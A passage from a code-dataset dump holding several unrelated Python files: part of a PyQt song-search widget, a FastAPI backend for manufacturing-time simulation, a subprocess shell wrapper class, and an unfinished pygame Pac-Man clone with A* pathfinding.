self.init_connect()\r\n self.init_thread()\r\n\r\n def init_ui(self):\r\n search_layout = QHBoxLayout()\r\n hlayout = QHBoxLayout()\r\n\r\n # self.search_lineEdit.setFixedSize(700, 40)\r\n self.search_lineEdit.setMinimumWidth(400)\r\n self.search_lineEdit.setFixedHeight(40)\r\n self.search_lineEdit.setCompleter(self.completer)\r\n self.search_lineEdit.setStyleSheet(\"QLineEdit{border-radius:10px;background:rgb(255,255,255,150);}\")\r\n self.search_lineEdit.setContextMenuPolicy(Qt.NoContextMenu)\r\n self.btn_search.setCursor(Qt.PointingHandCursor)\r\n self.btn_search.setFixedSize(60, 36)\r\n\r\n self.search_lineEdit.setPlaceholderText(\"搜索歌曲\")\r\n margins = self.search_lineEdit.textMargins()\r\n self.search_lineEdit.setTextMargins(margins.left() + 15, margins.top(), self.btn_search.width() + 15, margins.bottom())\r\n\r\n \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\r\n search_layout.addStretch()\r\n search_layout.addWidget(self.btn_search)\r\n search_layout.setSpacing(0)\r\n search_layout.setContentsMargins(0, 0, 15, 0)\r\n self.search_lineEdit.setLayout(search_layout)\r\n\r\n hlayout.addWidget(self.search_lineEdit)\r\n self.setLayout(hlayout)\r\n\r\n def init_connect(self):\r\n self.search_lineEdit.returnPressed.connect(self.btn_search.click)\r\n self.search_lineEdit.textChanged.connect(self.send_smart_box_signal)\r\n self.btn_search.clicked.connect(lambda: self.sig_search_info.emit(self.search_lineEdit.text()))\r\n\r\n def init_thread(self):\r\n self.word_thread.moveToThread(self.net_thread)\r\n\r\n # 关联子线程\r\n self.word_thread.sig_smartBoxReady.connect(self.update_completer)\r\n self.net_thread.finished.connect(self.net_thread.deleteLater)\r\n self.sig_search_smart_box.connect(self.word_thread.search_smart_box)\r\n\r\n # 启动工作线程\r\n self.net_thread.start()\r\n\r\n @pyqtSlot(str)\r\n def send_smart_box_signal(self, info):\r\n if info != \"\":\r\n self.sig_search_smart_box.emit(self.search_lineEdit.text())\r\n\r\n loop = QEventLoop()\r\n self.word_thread.sig_smartBoxReady.connect(loop.quit) # 开启事件循环,在这次结果没有获取之前不会再发信号\r\n loop.exec()\r\n\r\n @pyqtSlot(list)\r\n def update_completer(self, search_result):\r\n print(search_result)\r\n self.list_model.setStringList(search_result)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n demo = SearchWidget()\r\n demo.show()\r\n\r\n sys.exit(app.exec_())\r\n","repo_name":"yujunjiex/QQMusicDownload","sub_path":"GUI/search_widget.py","file_name":"search_widget.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"13907676288","text":"import configparser\nimport os\nimport sys\nimport uvicorn\nimport numpy as np\nfrom pathlib import Path\nfrom sqlalchemy import create_engine\nfrom fastapi import FastAPI, Response, status, Request\nfrom os.path import exists\n\nPACKAGE_PARENT = \"../\"\nSCRIPT_DIR = os.path.dirname(\n os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__)))\n)\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\ntry:\n from data.dataloader import DataLoader, DataBaseLoader\n from data.datawrangler import MachineDataLoader\n from data.datawrangler import DataWrangler\n from simulation.cartsetup import CartSetup\n from simulation.machine import Machine\n from simulation.manufacturing import Manufacturing\n from models.deploy import DeployModel\n from schemas import DummyMachine\nexcept:\n from src.data.dataloader import DataLoader, DataBaseLoader\n from src.data.datawrangler import MachineDataLoader\n from src.data.datawrangler import DataWrangler\n from src.simulation.cartsetup import CartSetup\n from src.simulation.machine import Machine\n from src.simulation.manufacturing import Manufacturing\n from src.models.deploy import DeployModel\n from src.schemas import DummyMachine\n\n\napp = FastAPI()\nconfig = configparser.ConfigParser()\nconfigPath = os.getcwd() + os.path.normpath(\"/src/settings.ini\")\nif exists(configPath):\n config.read(configPath)\nelse:\n config.add_section(\"default\")\n config.set(\"default\", \"version\", \"1.0\")\n config.add_section(\"network\")\n config.set(\"network\", \"port\", \"5000\")\n config.set(\"network\", \"host\", \"127.0.0.1\")\n config.set(\"network\", \"basepath\", \"/api/v7/\")\n\n\n@app.get(\"/\")\ndef root(response: Response, request: Request):\n \"\"\"endpoint to check base status of API\"\"\"\n response.status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n if exists(os.getcwd() + os.path.normpath(\"/data\")):\n response.status_code = status.HTTP_200_OK\n body = {\n \"API Version\": config.get(\"default\", \"version\"),\n \"Status\": response.status_code,\n \"Headers\": request.headers,\n \"Basepath\": config.get(\"network\", \"basepath\"),\n }\n return body\n\n\n@app.put(config.get(\"network\", \"basepath\") + \"/simulate/coating/\")\ndef startSimulation(productId: str, dummyMachine: DummyMachine, response: Response):\n \"\"\"endpoint to calculate the coating time for a given product\"\"\"\n # replace this with Database lookup\n if exists(os.getcwd() + \"/products.db\"):\n engine = create_engine(\"sqlite:///products.db\", echo=False)\n data = DataBaseLoader(engine, productId, \"m20\")\n else:\n path = Path(\n os.getcwd()\n + os.path.normpath(\"/data/programms/\" + productId + \"/\" + \"/m20\")\n )\n data = DataLoader(path)\n machine = Machine(dummyMachine)\n manufacturing = Manufacturing(data(), machine)\n simulationData = manufacturing.coating()\n return {\"time\": simulationData}\n\n\n@app.put(config.get(\"network\", \"basepath\") + \"/simulate/manufacturing/\")\ndef startSimulation(\n productId: str, useIdealState: bool, dummyMachine: DummyMachine, response: Response\n):\n \"\"\"endpoint to calculate the manufacturing time for a given product\"\"\"\n # replace this with Database lookup\n if exists(os.getcwd() + \"/products.db\"):\n engine = create_engine(\"sqlite:///products.db\", echo=False)\n data = DataBaseLoader(engine, productId, dummyMachine.machine)\n else:\n path = Path(\n os.getcwd()\n + os.path.normpath(\n \"/data/programms/\" + productId + \"/\" + dummyMachine.machine\n )\n )\n data = DataLoader(path)\n machine = Machine(dummyMachine)\n try:\n manufacturing = Manufacturing(data(), machine)\n simulationData = manufacturing(plotPCB=True, useIdealState=useIdealState)\n except Exception as e:\n response.status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n body = {\"error\": e}\n return body\n return simulationData\n\n\n@app.put(config.get(\"network\", \"basepath\") + \"/simulate/AI/\")\ndef startSimulation(\n productId: str, useIdealState: bool, dummyMachine: DummyMachine, response: Response\n):\n \"\"\"endpoint to calculate the manufacturing time for a given product\"\"\"\n # replace this with Database lookup\n if exists(os.getcwd() + \"/products.db\"):\n engine = create_engine(\"sqlite:///products.db\", echo=False)\n data = DataBaseLoader(engine, productId, dummyMachine.machine)\n else:\n path = Path(\n os.getcwd()\n + os.path.normpath(\n \"/data/programms/\" + productId + \"/\" + dummyMachine.machine\n )\n )\n data = DataLoader(path)\n machine = Machine(dummyMachine)\n try:\n data = data()\n offsets = max(data[2])\n manufacturing = Manufacturing(data, machine)\n plot_x, plot_y = manufacturing.getPlots()\n model = DeployModel(\n Path(os.getcwd() + os.path.normpath(\"/data/models/FINAL MODEL\"))\n )\n predArray = np.array(\n [\n len(data[0] * len(data[2])),\n 0 if machine.machineName == \"m10\" else 1,\n data[0][\"X\"].max() + offsets[0],\n data[0][\"Y\"].max() + offsets[1],\n ]\n )\n predictedData = model.predict(predArray)[0][0]\n except Exception as e:\n response.status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n body = {\"error\": e}\n return body\n return {\"time\": float(predictedData), \"plot_x\": plot_x, \"plot_y\": plot_y}\n\n\n@app.get(config.get(\"network\", \"basepath\") + \"/simulate/setup/\")\ndef setupSimulation(\n productId: str,\n machine: str,\n randomInterMin: int,\n randomInterMax: int,\n response: Response,\n):\n \"\"\"endpoint to calculate the setup time for a given product\"\"\"\n path = Path(\n os.getcwd() + os.path.normpath(\"/data/programms/\" + productId + \"/\" + machine)\n )\n try:\n data = DataLoader(path)\n except:\n return {\"time\": 420}\n\n setupM20 = CartSetup(data(), randomInterMin, randomInterMax)\n timeM20 = setupM20()\n return timeM20\n\n\n@app.get(config.get(\"network\", \"basepath\") + \"/predict/order/\")\nasync def predictOrder(request: Request, response: Response):\n \"\"\"endpoint to predict the best order of products between two given times\"\"\"\n request.body()\n print(request.query_params.get(\"startdate\"))\n print(request.query_params.get(\"enddate\"))\n\n\n@app.get(config.get(\"network\", \"basepath\") + \"/data/machinedata/\")\ndef getMachineData(response: Response):\n \"\"\"endpoint to receive machinedata\"\"\"\n try:\n data = MachineDataLoader()\n except:\n response.status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n return response\n\n return data.returnData()\n\n\n@app.get(config.get(\"network\", \"basepath\") + \"/data/options/\")\ndef getOptions():\n \"\"\"endpoint to get all available programms\"\"\"\n # replace with DB lookup for all possible programms\n path = Path(os.getcwd() + os.path.normpath(\"/data/programms\"))\n if exists(os.getcwd() + \"/products.db\"):\n engine = create_engine(\"sqlite:///products.db\", echo=False)\n dbData = engine.execute(\"SELECT * FROM 'products'\").fetchall()\n data = []\n for i in dbData:\n data.append(i[1])\n data = {\"programms\": data}\n else:\n data = {\"programms\": os.listdir(path)}\n\n return data\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\n \"main:app\",\n host=config.get(\"network\", \"host\"),\n port=config.getint(\"network\", \"port\"),\n log_level=\"debug\",\n reload=True,\n )\n","repo_name":"Worthy-Alpaca/dh-backend-api","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"26440725302","text":"import subprocess\nimport os\nimport tempfile\nimport collections\nimport time\nimport warnings\n\n\nclass BaseShell(object):\n class CommandExecutionError(Exception):\n def __init__(self, result, command):\n self.result = result\n self.command = \" \".join(command)\n\n def __str__(self):\n return \"Error (%s) running '%s': '%s' '%s'\" % (\n self.result.rc,\n self.command,\n self.result.stdout,\n self.result.stderr,\n )\n\n # Keeping for backwards compatibility, will be removed over time.\n @property\n def rc(self):\n warnings.warn(\"Direct use of rc in CommandExecutionError is deprecated\", DeprecationWarning)\n return self.result.rc\n\n @property\n def stdout(self):\n warnings.warn(\"Direct use of stdout in CommandExecutionError is deprecated\", DeprecationWarning)\n return self.result.stdout\n\n @property\n def stderr(self):\n warnings.warn(\"Direct use of stderr in CommandExecutionError is deprecated\", DeprecationWarning)\n return self.result.stderr\n\n # Effectively no autotimeout for commands.\n SHELLTIMEOUT = 0xFFFFFFF\n\n RunResult = collections.namedtuple(\"RunResult\", [\"rc\", \"stdout\", \"stderr\", \"timeout\"])\n\n @classmethod\n def _run(cls, arg_list, logger, monitor_func, timeout, shell=False):\n \"\"\"Separate the bare inner of running a command, so that tests can\n stub this function while retaining the related behaviour of run()\n \"\"\"\n\n assert type(arg_list) in [list, str, unicode], \"arg list must be list or str :%s\" % type(arg_list)\n\n # Allow simple commands to just be presented as a string. However do not start formatting the string this\n # will be rejected in a code review. If it has args present them as a list.\n if type(arg_list) in [str, unicode]:\n arg_list = arg_list.split()\n\n # Popen has a limit of 2^16 for the output if you use subprocess.PIPE (as we did recently) so use real files so\n # the output side is effectively limitless\n stdout_fd = tempfile.TemporaryFile()\n stderr_fd = tempfile.TemporaryFile()\n\n try:\n p = subprocess.Popen(arg_list, stdout=stdout_fd, stderr=stderr_fd, close_fds=True, shell=shell)\n\n # Rather than using p.wait(), we do a slightly more involved poll/backoff, in order\n # to poll the thread_state.teardown event as well as the completion of the subprocess.\n # This is done to allow cancellation of subprocesses\n rc = None\n max_wait = 1.0\n wait = 1.0e-3\n timeout += time.time()\n while rc is None:\n rc = p.poll()\n if rc is None:\n if monitor_func:\n monitor_func(p, arg_list, logger)\n\n time.sleep(wait)\n\n if time.time() > timeout:\n p.kill()\n stdout_fd.seek(0)\n stderr_fd.seek(0)\n return cls.RunResult(\n 254,\n stdout_fd.read().decode(\"ascii\", \"ignore\"),\n stderr_fd.read().decode(\"ascii\", \"ignore\"),\n True,\n )\n elif wait < max_wait:\n wait *= 2.0\n else:\n stdout_fd.seek(0)\n stderr_fd.seek(0)\n return cls.RunResult(\n rc,\n stdout_fd.read().decode(\"ascii\", \"ignore\"),\n stderr_fd.read().decode(\"ascii\", \"ignore\"),\n False,\n )\n finally:\n stdout_fd.close()\n stderr_fd.close()\n\n @classmethod\n def run(cls, arg_list, logger=None, monitor_func=None, timeout=SHELLTIMEOUT, shell=False):\n \"\"\"Run a subprocess, and return a tuple of rc, stdout, stderr.\n Record subprocesses run and their results in log.\n\n Note: we buffer all output, so do not run subprocesses with large outputs\n using this function.\n \"\"\"\n\n # TODO: add a 'quiet' flag and use it from spammy/polling plugins to avoid\n # sending silly amounts of command output back to the manager.\n if logger:\n logger.debug(\"Shell.run: %s\" % repr(arg_list))\n\n os.environ[\"TERM\"] = \"\"\n\n result = cls._run(arg_list, logger, monitor_func, timeout, shell=shell)\n\n return result\n\n @classmethod\n def try_run(cls, arg_list, logger=None, monitor_func=None, timeout=SHELLTIMEOUT, shell=False):\n \"\"\"Run a subprocess, and raise an exception if it returns nonzero. Return\n stdout string.\n \"\"\"\n\n result = cls.run(arg_list, logger, monitor_func, timeout, shell=shell)\n\n if result.rc != 0:\n raise cls.CommandExecutionError(result, arg_list)\n\n return result.stdout\n\n @classmethod\n def run_canned_error_message(cls, arg_list):\n \"\"\"\n Run a shell command return None is successful, or User Error message if not\n :param args:\n :return: None if successful or canned user error message\n \"\"\"\n result = cls.run(arg_list)\n\n if result.rc != 0:\n return \"Error (%s) running '%s': '%s' '%s'\" % (result.rc, \" \".join(arg_list), result.stdout, result.stderr)\n\n return None\n\n\n# By default Shell is this BaseShell class, and other iml_common modules use BaseShell via Shell by default.\n# However consumers (namely the agent today) may change Shell to reference their own SubClass version and this will\n# mean that iml_common consumers of Shell use the SubClass rather than the base.\nShell = BaseShell\n\n\ndef set_shell(new_shell_class):\n \"\"\"\n Change the Shell the iml_common (and any other referencers of Shell in this module) use for Shell commands\n :param new_shell_class: The new Shell classs to use\n \"\"\"\n global Shell\n Shell = new_shell_class\n","repo_name":"whamcloud/iml-common","sub_path":"iml_common/lib/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"17362252293","text":"import pygame, sys, copy, time, heapq\nfrom pygame.locals import *\n\n#http://www.redblobgames.com/pathfinding/a-star/implementation.html\nclass PriorityQueue:\n def __init__(self):\n self.elements = []\n \n def empty(self):\n return len(self.elements) == 0\n \n def put(self, item, priority):\n heapq.heappush(self.elements, (priority, item))\n \n def get(self):\n return heapq.heappop(self.elements)[1]\n\nclass Game():\n def __init__(self):\n pygame.init()\n \n #debug tools#\n self.drawTargetTiles = 1\n #############\n \n tileSize = 24\n self.screen = pygame.display.set_mode((1024, 724))\n self.clock = pygame.time.Clock()\n \n self.scatterTimer = 0 \n self.pelletsCollected = 0\n self.font = pygame.font.Font(None, 36)\n\n #build level\n self.level = Level()\n \n self.levelCoords = copy.deepcopy(self.level.grid)\n self.blockS = pygame.sprite.Group()\n\n self.pellet = Pellet((200, 200))\n self.pelletS = pygame.sprite.RenderPlain((self.pellet))\n \n\n self.walls = pygame.sprite.Group()\n for row in range(len(self.level.grid)):\n for column in range(len(self.level.grid[1])):\n if self.level.grid[row][column] == 1:\n block = Block(( 25 + (column*tileSize), 25 + (row*tileSize)))\n self.blockS.add(pygame.sprite.RenderPlain((block)))\n else:\n self.levelCoords[row][column] = ( 25 + (column*tileSize), 25 + (row*tileSize))\n if self.level.grid[row][column] == 0:\n pellet = Pellet(( 25 + (column*tileSize), 25 + (row*tileSize)))\n self.pelletS.add(pygame.sprite.RenderPlain((pellet)))\n\n self.gridLength = len(self.levelCoords[0]) - 1\n self.gridHeight = len(self.levelCoords) - 1\n \n self.totalPellets = len(self.pelletS)\n\n #create and spawn player\n\n spawn = self.levelCoords[21][14]\n\n self.pacman = Pacman(spawn)\n self.pacmanS = pygame.sprite.RenderPlain((self.pacman))\n\n #create ghosts\n self.blinky = Ghost(self.levelCoords[13][13], 0)\n self.inky = Ghost(self.levelCoords[14][13], 1)\n self.pinky = Ghost(self.levelCoords[13][14], 2)\n self.clyde = Ghost(self.levelCoords[14][14], 3)\n \n self.ghostS = pygame.sprite.RenderPlain((self.blinky))\n self.ghostS.add(pygame.sprite.RenderPlain((self.inky))) \n self.ghostS.add(pygame.sprite.RenderPlain((self.pinky))) \n self.ghostS.add(pygame.sprite.RenderPlain((self.clyde)))\n\n def mainLoop(self):\n running = True\n self.startTime = time.clock()\n self.pinky.canMove = 1\n \n while running:\n #INPUT\n self.clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT: running = False\n if not hasattr(event, 'key'): continue\n if event.key == K_ESCAPE: running = False\n \n if event.key == K_RIGHT: self.pacman.kR = 2\n if event.key == K_LEFT: self.pacman.kL = 2\n if event.key == K_UP: self.pacman.kU = 2\n if event.key == K_DOWN: self.pacman.kD = 2\n\n #UPDATE\n pelletCollisions = pygame.sprite.spritecollide(self.pacman, self.pelletS, True)\n for pellet in pelletCollisions:\n self.pelletsCollected += 1\n \n self.pacman.update()\n \n self.blinky.update()\n self.inky.update()\n self.pinky.update()\n self.clyde.update()\n\n #Ghosts leaving house logic\n curTime = time.clock()\n timePassed = int(curTime - self.startTime)\n if not self.blinky.canMove:\n if timePassed >= 3: self.blinky.canMove = 1\n if not self.inky.canMove:\n if self.pelletsCollected == 30: self.inky.canMove = 1\n if not self.clyde.canMove: \n if self.pelletsCollected != 0:\n percentCollected = (self.pelletsCollected / float(self.totalPellets)) * 100\n if percentCollected >= 20: self.clyde.canMove = 1\n \n #Scatter mode\n if timePassed == 25 or timePassed == 60 or timePassed == 105:\n self.blinky.scatter = 1\n self.inky.scatter = 1\n self.pinky.scatter = 1\n self.clyde.scatter = 1\n\n if timePassed == 35 or timePassed == 70 or timePassed == 115:\n self.blinky.scatter = 0\n self.inky.scatter = 0\n self.pinky.scatter = 0\n self.clyde.scatter = 0\n\n #RENDER\n self.screen.fill((0, 0, 0))\n \n self.pacmanS.draw(self.screen)\n self.pelletS.draw(self.screen)\n self.blockS.draw(self.screen) \n self.ghostS.draw(self.screen)\n\n #UI\n text = self.font.render(\"Score %s\" %(self.pelletsCollected * 100), 1, (255, 255, 255))\n textpos = text.get_rect(left=self.screen.get_width() - 300)\n textpos.move_ip(0, 20)\n self.screen.blit(text, textpos)\n \n textpos.move_ip(0, 50)\n y, x = self.pacman.gridLocation\n grid = [x, y]\n text = self.font.render(\"Pacman position %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n \n textpos.move_ip(0, 50)\n y, x = self.blinky.targetTile\n grid = [x, y]\n text = self.font.render(\"Blinky target %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n if self.drawTargetTiles: pygame.draw.rect(self.screen, (255, 0, 0), (5 + (x * 24), 5 + (y * 24), 10, 10))\n\n textpos.move_ip(0, 50)\n y, x = self.pinky.targetTile\n grid = [x, y]\n text = self.font.render(\"Pinky target %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n if self.drawTargetTiles: pygame.draw.rect(self.screen, (255, 153, 255), (5 + (x * 24), 5 + (y * 24), 10, 10))\n\n textpos.move_ip(0, 50)\n y, x = self.inky.targetTile\n grid = [x, y]\n text = self.font.render(\"Inky target %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n if self.drawTargetTiles: pygame.draw.rect(self.screen, (0, 0, 255), (5 + (x * 24), 5 + (y * 24), 10, 10))\n\n textpos.move_ip(0, 50)\n y, x = self.clyde.targetTile\n grid = [x, y]\n text = self.font.render(\"Clyde target %s\" %str(grid).strip('[]'), 1, (255, 255, 255))\n self.screen.blit(text, textpos)\n if self.drawTargetTiles: pygame.draw.rect(self.screen, (255, 255, 0), (5 + (x * 24), 5 + (y * 24), 10, 10))\n\n pygame.display.flip()\n \n pygame.quit()\n\nclass Level(): #0 = pellet #1 = wall #2 = nothing\n def __init__(self):\n self.weights = {}\n self.walls = []\n self.intersections = []\n self.grid = [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 2, 2, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 2, 2, 2, 2, 2, 2, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1], \n [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1], \n [1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1], \n [1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1], \n [1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1],\n [1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]]\n\n self.intersections.append((14,14))\n self.intersections.append((10,14))\n self.intersections.append((10,13))\n for row in range(len(self.grid)):\n for column in range(len(self.grid[1])):\n if self.grid[row][column] == 1:\n self.walls.append((row, column))\n count = 0\n if self.grid[row][column] == 0:\n if self.grid[row-1][column] == 0 or self.grid[row-1][column] == 2:\n count += 1\n elif self.grid[row+1][column] == 0 or self.grid[row+1][column] == 2:\n count += 1\n if self.grid[row][column-1] == 0 or self.grid[row][column-1] == 2:\n count += 1\n elif self.grid[row][column+1] == 0 or self.grid[row][column+1] == 2:\n count += 1\n\n if count >= 2:\n self.intersections.append((row, column))\n\n print(self.intersections)\n print(len(self.intersections))\n\n def heuristic(self, a, b):\n (x1, y1) = a\n (x2, y2) = b\n return abs(x1 - x2) + abs(y1 - y2)\n\n def aStarSearch(self, start, end):\n frontier = PriorityQueue()\n frontier.put(start, 0)\n cameFrom = {}\n costSoFar = {}\n cameFrom[start] = None\n costSoFar[start] = 0\n \n while not frontier.empty():\n current = frontier.get()\n\n if current == end:\n break\n \n for next in self.neighbors(current):\n x, y = next\n cost = costSoFar[current] + 1\n if next not in costSoFar or cost < costSoFar[next] and self.grid[x][y] != 1:\n costSoFar[next] = cost\n priority = cost + self.heuristic(end, next)\n frontier.put(next, priority)\n cameFrom[next] = current\n \n return cameFrom, costSoFar\n\n def reconstructPath(self, cameFrom, start, end):\n current = end\n path = [current]\n while current != start:\n current = cameFrom[current]\n path.append(current)\n path.reverse()\n return path\n\n def neighbors(self, id):\n (x, y) = id\n results = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)] \n return results\n\nclass Pacman(pygame.sprite.Sprite):\n def __init__(self, position):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('pacman.png')\n self.position = position\n self.rect = self.image.get_rect()\n self.rect.center = self.position\n self.direction = 0\n self.speed = 0\n self.prevPosition = position\n self.gridLocation = (0, 0)\n self.pooledInput = 4\n self.kU = self.kD = self.kL = self.kR = 0\n \n def update(self):\n x, y = self.position\n xVel = yVel = 0\n row, column = self.gridLocation\n \n #block collision\n blockCollisions = pygame.sprite.spritecollide(self, game.blockS, False)\n collided = 0\n for block in blockCollisions:\n if block:\n self.speed = 0\n collided = 1\n\n if self.kU and game.levelCoords[row-1][column] != 1 or self.kL and game.levelCoords[row][column-1] != 1 or self.kD and game.levelCoords[row+1][column] != 1 or self.kR and game.levelCoords[row][column+1] != 1:\n if not collided: self.speed = 1\n \n #input pooling\n if self.kU:\n if game.levelCoords[row-1][column] == 1: self.pooledInput = 0\n else: self.direction = 0\n if self.kL:\n if game.levelCoords[row][column-1] == 1: self.pooledInput = 1\n else: self.direction = 1\n if self.kD:\n if game.levelCoords[row+1][column] == 1: self.pooledInput = 2\n else: self.direction = 2\n if self.kR:\n if game.levelCoords[row][column+1] == 1: self.pooledInput = 3\n else: self.direction = 3\n\n if self.pooledInput == 0 and game.levelCoords[row-1][column] != 1:\n self.direction = 0\n self.pooledInput = 4\n if self.pooledInput == 1 and game.levelCoords[row][column-1] != 1:\n self.direction = 1\n self.pooledInput = 4 \n if self.pooledInput == 2 and game.levelCoords[row+1][column] != 1:\n self.direction = 2\n self.pooledInput = 4\n if self.pooledInput == 3 and game.levelCoords[row][column+1] != 1:\n self.direction = 3\n self.pooledInput = 4\n\n #update position \n if self.direction == 0: yVel = -self.speed\n elif self.direction == 1: xVel = -self.speed\n elif self.direction == 2: yVel = self.speed\n elif self.direction == 3: xVel = self.speed\n \n nextPosition = (x + xVel, y + yVel)\n\n for i in range(0, len(game.levelCoords)):\n for j in range(0, len(game.levelCoords[i])):\n tmpRect = self.image.get_rect()\n tmpRect.center = nextPosition\n if self.rect.center == game.levelCoords[i][j]: self.gridLocation = (i, j)\n if tmpRect.center == game.levelCoords[i][j]: self.gridLocation = (i, j)\n\n if collided:\n nextPosition = self.prevPosition\n \n self.prevPosition = self.position\n self.position = nextPosition \n self.rect = self.image.get_rect()\n self.rect.center = self.position \n \n #reset key presses\n self.kU = self.kD = self.kL = self.kR = 0\n \nclass Pellet(pygame.sprite.Sprite):\n\n def __init__(self, position):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('pellet.png')\n self.position = position\n self.rect = self.image.get_rect()\n self.rect.center = self.position \n\nclass Block(pygame.sprite.Sprite):\n def __init__(self, position):\n pygame.sprite.Sprite.__init__(self)\n 